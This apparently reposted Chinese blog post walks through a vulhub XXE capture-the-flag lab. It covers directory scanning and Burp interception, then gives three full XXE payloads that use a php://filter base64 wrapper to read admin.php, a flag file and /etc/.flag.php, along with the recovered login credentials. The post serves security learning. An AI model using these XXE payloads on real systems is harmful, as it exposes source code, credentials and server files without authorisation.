首页 > 其他分享 >vulhub xxe靶机

vulhub xxe靶机

时间:2024-08-29 18:53:17浏览次数:11  
标签:vulhub admin 步骤 解码 base64 xxe 靶机 目录

步骤一:搜索靶机地址

步骤二:利用dirsearsh扫描目录

步骤三:进入靶机

进入robots.txt

步骤四:访问/xxe

步骤五:输入用户名密码,利用burp抓包,传送至重放器

输入:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>
 

进行base64解码有用户名密码

密码进行md5解密

步骤六:进入/xxe/admin.php输入用户名:administhebest 密码:admin@123

点击Flag

进入新目录

读取目录:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>
 

进行base64解码

得出Flag进行base32解码

得出结果进行base64解码

步骤七:读取目录

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
 

进行base64解码

步骤八:在www目录下添加php文件

访问本机php文件,得出结果

标签:vulhub,admin,步骤,解码,base64,xxe,靶机,目录
From: https://blog.csdn.net/2301_82061181/article/details/141684057

相关文章

  • 网络安全实训六(靶机实例DC-3)
    1信息收集1.1获取靶机IP1.2扫描靶机网站的目录1.3扫描端口和服务器信息1.4进入网站1.5在msf中给搜索joomla扫描器1.6设置参数查看joomla版本信息1.7按照版本号搜索漏洞1.8查看漏洞使用2渗透2.1查看是否存在SQL注入2.2获取到数据库......
  • VulNyx - Ceres 靶机
    有80端口访问看看他这个挺奇葩的看了wp才知道file.php的参数是file他会自动给你加上php也就是说file=secret.php读不到数据要file=secret才能读到数据伪协议读取文件<?phpinclude($_GET["file"].".php");?><?phpsystem("id");///......
  • NYX靶机笔记
    NYX靶机笔记概述VulnHub里的简单靶机靶机地址:https://download.vulnhub.com/nyx/nyxvm.zip1、nmap扫描1)主机发现#-sn只做ping扫描,不做端口扫描nmap-sn192.168.84.1/24#发现靶机ip为MACAddress:00:50:56:E0:D5:D4(VMware)Nmapscanreportfor192.168.84.137......
  • 【第66课】Java安全&SPEL表达式&SSTI模版注入&XXE&JDBC&MyBatis注入
    免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉......
  • Vulnhub靶机:AI-WEB-1.0
    一.网站查询二.扫描当前网站目录 扫出有http://172.16.1.88/robots.txt继续扫这个刚扫出来的,然后得出 我们再访问m3dinfo/info.php和 /se3reTdir777/这俩目录 得到如上图所示三.进行sql注入1.判断是否有sql注入 /有结果,有报错 2.利用burp抓包进行注入......
  • HTB-BoardLight靶机笔记
    BoardLight靶机笔记概述HTB的靶机BoardLight靶机地址:https://app.hackthebox.com/machines/BoardLight一、nmap扫描1)端口扫描-sTtcp全连接扫描--min-rate以最低速率10000扫描-p-扫描全端口sudonmap-sT--min-rate10000-p--oports10.10.11.11Warning:10.1......
  • XXE漏洞
    基本概念XML指可扩展标记语言(eXtensibleMarkupLanguage),是一种用于标记电子文件使其具有结构性的标记语言,被设计用来传输和存储数据。文件读取<?xmlversion="1.0"?><!DOCTYPEdata[<!ELEMENTdata(#ANY)><!ENTITYfileSYSTEM"file:///etc/passwd">]><data>&a......
  • SAR靶机笔记
    SAR靶机笔记概述SAR是Vulnhub上的靶机,大家可以去vulnhub网站上去进行下载。这里有链接:https://download.vulnhub.com/sar/sar.zip一丶常规的nmap扫描1)主机发现sn只做ping扫描,不做端口扫描nmap-sn192.168.84.1/24MACAddress:00:50:56:FA:CB:D3(VMware)N......
  • 一些免费好用的靶机渗透测试环境
    1、Vulhub:(各种漏洞环境集合,一键搭建漏洞测试靶场)https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2、Vulnhub:(国外实战靶场,适合入门提高)https://www.vulnhub.com/3、Vulnstack(红队实战靶场,域、横向渗透、多层网络,强烈推荐,目前共7个靶场,网上writeup......
  • Vulnhub JIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修......